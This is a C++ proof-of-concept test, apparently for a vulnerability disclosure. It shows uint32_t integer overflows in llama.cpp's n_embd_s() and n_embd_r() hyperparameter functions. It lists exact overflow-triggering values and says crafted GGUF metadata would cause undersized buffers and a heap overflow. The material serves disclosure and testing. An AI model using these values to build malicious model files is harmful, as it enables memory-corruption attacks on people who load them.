File size: 7,016 Bytes

0513a39

/**
 * Empirical proof: uint32_t integer overflow in llama_hparams::n_embd_s()
 *
 * This test directly instantiates llama_hparams from llama.cpp and calls
 * n_embd_s() with overflow-inducing values, proving the overflow occurs
 * in the actual production code (not a simulation).
 *
 * Build:
 *   cd llama.cpp
 *   g++ -std=c++17 -I src -I include -I ggml/include \
 *       ../gguf_poc/test_hparams_overflow.cpp src/llama-hparams.cpp \
 *       -o ../gguf_poc/test_hparams_overflow
 *
 * Run:
 *   ./test_hparams_overflow
 */

#include "llama-hparams.h"
#include <cstdio>
#include <cstdint>
#include <cstring>

int main() {
    printf("================================================================\n");
    printf("EMPIRICAL PROOF: uint32_t overflow in llama_hparams::n_embd_s()\n");
    printf("================================================================\n\n");

    // --- Test 1: Mamba path (ssm_d_state * ssm_d_inner) ---
    {
        printf("--- Test 1: Mamba path (line 169: return ssm_d_state * ssm_d_inner) ---\n");

        llama_hparams hp = {};
        memset(&hp, 0, sizeof(hp));
        hp.n_layer = 1;

        // Set values that overflow when multiplied as uint32_t
        hp.ssm_d_state = 1073741825;  // (2^30 + 1)
        hp.ssm_d_inner = 4;

        // Ensure we hit the Mamba path (wkv_head_size=0, n_embd_head_kda=0)
        hp.wkv_head_size = 0;
        hp.n_embd_head_kda = 0;

        uint32_t result = hp.n_embd_s();

        // Correct value in 64-bit: 1073741825 * 4 = 4,294,967,300
        uint64_t correct = (uint64_t)hp.ssm_d_state * hp.ssm_d_inner;

        printf("  ssm_d_state      = %u\n", hp.ssm_d_state);
        printf("  ssm_d_inner      = %u\n", hp.ssm_d_inner);
        printf("  n_embd_s() returned: %u\n", result);
        printf("  Correct value:       %llu\n", (unsigned long long)correct);
        printf("  OVERFLOW: %llu -> %u (buffer is %llux too small!)\n",
               (unsigned long long)correct, result,
               (unsigned long long)(correct / result));
        printf("  Status: %s\n\n", result < correct ? "VULNERABLE (overflow confirmed)" : "SAFE");
    }

    // --- Test 2: RWKV path (n_embd * wkv_head_size) ---
    {
        printf("--- Test 2: RWKV6 path (line 158: return n_embd * wkv_head_size) ---\n");

        llama_hparams hp = {};
        memset(&hp, 0, sizeof(hp));
        hp.n_layer = 1;

        hp.n_embd = 65537;
        hp.wkv_head_size = 65537;

        uint32_t result = hp.n_embd_s();
        uint64_t correct = (uint64_t)hp.n_embd * hp.wkv_head_size;

        printf("  n_embd           = %u\n", hp.n_embd);
        printf("  wkv_head_size    = %u\n", hp.wkv_head_size);
        printf("  n_embd_s() returned: %u\n", result);
        printf("  Correct value:       %llu\n", (unsigned long long)correct);
        printf("  OVERFLOW: %llu -> %u (buffer is %llux too small!)\n",
               (unsigned long long)correct, result,
               (unsigned long long)(correct / result));
        printf("  Status: %s\n\n", result < correct ? "VULNERABLE (overflow confirmed)" : "SAFE");
    }

    // --- Test 3: Kimi KDA path (n_embd_head_kda^2 * n_head) ---
    {
        printf("--- Test 3: Kimi KDA path (line 165: return n_embd_head_kda * n_embd_head_kda * n_head()) ---\n");

        llama_hparams hp = {};
        memset(&hp, 0, sizeof(hp));
        hp.n_layer = 1;
        hp.wkv_head_size = 0;

        hp.n_embd_head_kda = 65536;  // 65536^2 = 2^32, wraps to 0
        // n_head() reads n_head_arr[0], must be set
        hp.n_head_arr[0] = 1;

        uint32_t result = hp.n_embd_s();
        uint64_t correct = (uint64_t)hp.n_embd_head_kda * hp.n_embd_head_kda * hp.n_head_arr[0];

        printf("  n_embd_head_kda  = %u\n", hp.n_embd_head_kda);
        printf("  n_head           = %u\n", hp.n_head_arr[0]);
        printf("  n_embd_s() returned: %u\n", result);
        printf("  Correct value:       %llu\n", (unsigned long long)correct);
        if (result == 0) {
            printf("  OVERFLOW: wraps to ZERO! ggml_new_tensor_1d allocates 0 bytes!\n");
        } else {
            printf("  OVERFLOW: %llu -> %u\n", (unsigned long long)correct, result);
        }
        printf("  Status: %s\n\n", result < correct ? "VULNERABLE (overflow confirmed)" : "SAFE");
    }

    // --- Test 4: n_embd_r() Mamba path ---
    {
        printf("--- Test 4: n_embd_r() Mamba path (line 152) ---\n");

        llama_hparams hp = {};
        memset(&hp, 0, sizeof(hp));
        hp.n_layer = 1;
        hp.wkv_head_size = 0;
        hp.n_shortconv_l_cache = 0;
        hp.n_embd_head_kda = 0;

        hp.ssm_d_conv = 4;
        hp.ssm_d_inner = 4;
        hp.ssm_n_group = 1;
        hp.ssm_d_state = 715827883;  // chosen so (d_conv-1)*(d_inner + 2*1*d_state) overflows

        uint32_t result = hp.n_embd_r();
        // (4-1) * (4 + 2*1*715827883) = 3 * (4 + 1431655766) = 3 * 1431655770 = 4294967310
        uint64_t sub = (uint64_t)hp.ssm_d_inner + 2ULL * hp.ssm_n_group * hp.ssm_d_state;
        uint64_t correct = ((uint64_t)hp.ssm_d_conv - 1) * sub;

        printf("  ssm_d_conv   = %u\n", hp.ssm_d_conv);
        printf("  ssm_d_inner  = %u\n", hp.ssm_d_inner);
        printf("  ssm_n_group  = %u\n", hp.ssm_n_group);
        printf("  ssm_d_state  = %u\n", hp.ssm_d_state);
        printf("  n_embd_r() returned: %u\n", result);
        printf("  Correct value:       %llu\n", (unsigned long long)correct);
        printf("  Status: %s\n\n", result < correct ? "VULNERABLE (overflow confirmed)" : "SAFE");
    }

    // --- Test 5: Double overflow at allocation site ---
    {
        printf("--- Test 5: Double overflow simulation (allocation site lines 94-95) ---\n");
        printf("  Code: hparams.n_embd_s() * mem_size\n");
        printf("  Both are uint32_t, multiplication overflows before widening to int64_t\n\n");

        uint32_t n_embd_s_val = 65536;  // legitimate n_embd_s() return value
        uint32_t mem_size = 65537;       // batch/sequence size

        uint32_t result = n_embd_s_val * mem_size;  // uint32_t * uint32_t
        uint64_t correct = (uint64_t)n_embd_s_val * mem_size;

        printf("  n_embd_s()   = %u\n", n_embd_s_val);
        printf("  mem_size     = %u\n", mem_size);
        printf("  uint32 mul   = %u\n", result);
        printf("  Correct mul  = %llu\n", (unsigned long long)correct);
        printf("  Status: %s\n\n", result < correct ? "VULNERABLE (double overflow)" : "SAFE");
    }

    printf("================================================================\n");
    printf("CONCLUSION: All overflow paths in n_embd_s()/n_embd_r() are\n");
    printf("confirmed vulnerable. An attacker crafting GGUF metadata with\n");
    printf("these values causes undersized buffer allocation in\n");
    printf("llama_memory_recurrent (lines 94-95), leading to heap overflow\n");
    printf("when recurrent state data is written during inference.\n");
    printf("================================================================\n");

    return 0;
}